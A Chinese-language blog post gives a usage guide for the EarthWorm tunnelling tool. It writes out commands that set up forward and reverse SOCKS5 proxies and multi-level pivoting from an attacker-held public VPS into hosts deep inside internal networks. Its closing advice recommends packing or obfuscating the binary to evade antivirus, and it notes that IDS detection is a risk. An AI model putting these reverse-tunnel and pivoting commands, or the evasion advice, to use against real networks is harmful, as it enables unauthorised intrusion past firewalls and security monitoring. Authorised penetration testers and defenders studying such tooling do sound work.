EarthWorm (EW) 内网穿透工具使用指南
EarthWorm (EW) 使用指南
EarthWorm 是一款高性能的轻量级内网穿透工具,支持正向/反向 SOCKS5 代理及多级转发。
1. 基础环境
- 核心程序:单个二进制文件(如
ew_for_Win.exe,ew_for_linux64等)。 - 核心参数:通过
-s参数指定链路模式。
2. 常用操作场景
场景 A:正向 SOCKS5 代理
适用情况:目标机有公网 IP,且防火墙允许外部连接其特定端口。
在目标机上开启监听:
1
2
3
4
5
6
7
8
9
10
11
12./ew -s ssocksd -l 8888
1. **攻击机操作**:直接设置浏览器或代理工具(Proxifier)连接 `目标机IP:8888` 即可。
### 场景 B:反向 SOCKS5 代理(最常用)
**适用情况**:目标机在内网,无法从外部访问,但它可以主动连接外网。
1. **在公网 VPS 上监听(转接隧道):**
将 1080 端口收到的代理请求转发给反连 8888 端口的机器
./ew -s rcsocks -l 1080 -e 8888
1
2
3
4
5
2. **在内网目标机上执行(主动回连):**
./ew -s rssocks -d <公网VPS_IP> -e 8888
1
2
3
4
5
6
7
8
9
10
11
12
13
3. **使用方式**:连接 `公网VPS_IP:1080` 即可进入内网。
------
## 3. 进阶:二重内网渗透
### 情况 1:A主机公网可达,B主机仅A可达
1. **B 主机(内网深处)**:开启正向代理。
./ew -s ssocksd -l 9999
1
2
3
4
5
2. **A 主机(边界跳板)**:将流量转发给 B。
./ew -s lcx_tran -l 1080 -f <B主机IP> -g 9999
1
2
3
4
5
6
7
8
9
3. **使用方式**:访问 `A主机IP:1080`。
### 情况 2:A、B 均在内网(通过公网 VPS 中转)
1. **公网 VPS**:开启监听。
./ew -s lcx_listen -l 1080 -e 8888
1
2
3
4
5
2. **B 主机(内网深处)**:开启代理服务。
./ew -s ssocksd -l 9999
1
2
3
4
5
3. **A 主机(中继跳板)**:打通公网与内网 B 的隧道。
./ew -s lcx_slave -d
-e 8888 -f <B主机IP> -g 9999 使用方式:访问
VPS_IP:1080。
4. 参数手册
模式说明 (-s)
- ssocksd:正向 SOCKS5 服务。
- rcsocks:反向代理监听服务端(配合
rssocks)。 - rssocks:反向代理客户端。
- lcx_listen:中转模式,监听两个端口,打通数据流。
- lcx_tran:中转模式,监听本地,转发至远程。
- lcx_slave:反向中转模式,同时连接两个远程地址。
通用选项
-l:本地监听端口。-d:远程目标 IP。-e:远程目标端口。-f:转发目标 IP。-g:转发目标端口。-t <ms>:设置超时时间,默认 10000ms (10秒)。
5. 安全建议
[!WARNING]
- 特征明显:由于 EW 长时间未更新,其流量特征容易被 IDS/态势感知拦截。
- 免杀处理:二进制文件极易被杀毒软件直接清除,实战中需配合加壳或代码混淆。
- 替代方案:若环境允许,建议优先考虑 frp, nps 或 Venom 等具备加密能力的工具。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 BenD!







